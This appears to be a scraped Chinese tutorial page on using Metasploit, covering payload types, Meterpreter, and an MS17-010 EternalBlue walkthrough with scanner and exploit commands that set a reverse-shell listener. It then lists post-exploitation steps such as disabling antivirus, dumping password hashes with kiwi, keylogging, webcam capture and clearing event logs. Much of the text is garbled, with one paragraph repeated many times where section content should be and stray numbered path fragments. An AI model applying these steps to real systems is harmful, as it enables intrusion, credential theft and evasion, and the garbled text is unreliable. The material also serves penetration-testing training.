实验环境
简介
使用方法
1.基础使用
2.漏洞利用(exploit)
/usr/share/metasploit-framework/modules/exploits
3.攻击载荷
3.1payload模块路径
/usr/share/metasploit-framework /modules/payloads
3.2Metasploit中的payload模块主要类型
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager:这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
# Single Payload的格式为:
<target>/ <single>如:Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>如:Windows/meterpreter/reverse_tcp
当我们在Metasploit中执行 show payloads命令之后,它会给我们显示一个可使用的Payload列表
注意:
正向连接使用场景
反向连接使用场景
反向连接80和443端口使用场景
4.Meterpreter
4.1.Meterpreter是如何工作的
4.2Meterpreter的特点
Meterpreter完全驻留内存,没有写入到磁盘。
Meterpreter注入的时候不会产生新的进程,并可以很容易的移植到其他正在运行的进程。
默认情况下,Meterpreter的通信是加密的,所以很安全。
扩展性,许多新的特征模块可以被加载。
5.MS17_010(永恒之蓝)
5.1 查找漏洞相关模块
5.2 搜索MS17_010漏洞
search ms17_010#利用search命令,搜索漏洞相关利用模块
5.3 利用Auxiliary辅助探测模块进行漏洞探测
use auxiliary/scanner/smb /smb_ms17_010
show options #查看这个模块需要配置的信息
set rhosts 192.168.10.30-192.168.10.50
exploit
use exploit/windows/smb/ms17_010_eternalblue
/usr/share/metasploit-framework /modules/payloads 0
/usr/share/metasploit-framework /modules/payloads 1
5.5 Payload攻击载荷模块
show payloads
# 该命令可以查看当前漏洞利用模块下所有的payload/usr/share/metasploit-framework /modules/payloads 2
/usr/share/metasploit-framework /modules/payloads 3
set RHOST 192.168.10.42
# 设置RHOST,也就是被攻击的IPset LHOST 192.168.10.37
# 设置LHOST,也就是我们的主机,用于接收从目标机弹回来的shellset lport 1377
# 设置lport,也就是我们主机的端口,反弹shell到这个端口后渗透阶段
/usr/share/metasploit-framework /modules/payloads 4
/usr/share/metasploit-framework /modules/payloads 5
查看主机是否运行在虚拟机上
/usr/share/metasploit-framework /modules/payloads 6
关闭杀毒软件
/usr/share/metasploit-framework /modules/payloads 7
获取目标主机的详细信息
/usr/share/metasploit-framework /modules/payloads 8
访问文件系统
/usr/share/metasploit-framework /modules/payloads 9
上传/下载文件
下载文件
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager:这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
0
上传文件
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager:这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
1
权限提升
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager:这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
2
获取用户密码
抓取自动登录密码
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager:这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
3
导出密码哈希
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager:这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
4
MSF自带kiwi模块抓取密码
kiwi模块
kiwi模块使用
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager:这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
5
运行程序
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager:这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
6
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager:这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
7
屏幕截图
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager:这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
8
创建一个新账号
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager:这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
9
# Single Payload的格式为:
<target>/ <single>如:Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>如:Windows/meterpreter/reverse_tcp 0
# Single Payload的格式为:
<target>/ <single>如:Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>如:Windows/meterpreter/reverse_tcp 1
启用远程桌面
# Single Payload的格式为:
<target>/ <single>如:Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>如:Windows/meterpreter/reverse_tcp 2
键盘记录
进程迁移
getpid
查看我们当前进程的IDmigrate+目标ID进程
迁移进程run post/windows/manage/migrate
系统会自动寻找合适进程并迁移进程禁止目标主机使用键盘鼠标
# Single Payload的格式为:
<target>/ <single>如:Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>如:Windows/meterpreter/reverse_tcp 3
用目标主机摄像头拍照
# Single Payload的格式为:
<target>/ <single>如:Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>如:Windows/meterpreter/reverse_tcp 4
常用的扩展库介绍
load/use命令
# Single Payload的格式为:
<target>/ <single>如:Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>如:Windows/meterpreter/reverse_tcp 5
load -l
会列出所有可用的扩展load
双击TAB键列出可用扩展run命令
# Single Payload的格式为:
<target>/ <single>如:Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>如:Windows/meterpreter/reverse_tcp 6
run+双击Tab键
,会列出所有的已有脚本
服务器启动
设置socks代理
portfwd端口转发
# Single Payload的格式为:
<target>/ <single>如:Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>如:Windows/meterpreter/reverse_tcp 7
清除事件日志
# Single Payload的格式为:
<target>/ <single>如:Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>如:Windows/meterpreter/reverse_tcp 8
导入并执行powershell脚本
# Single Payload的格式为:
<target>/ <single>如:Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>如:Windows/meterpreter/reverse_tcp 9
加载stdapi
升级session
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...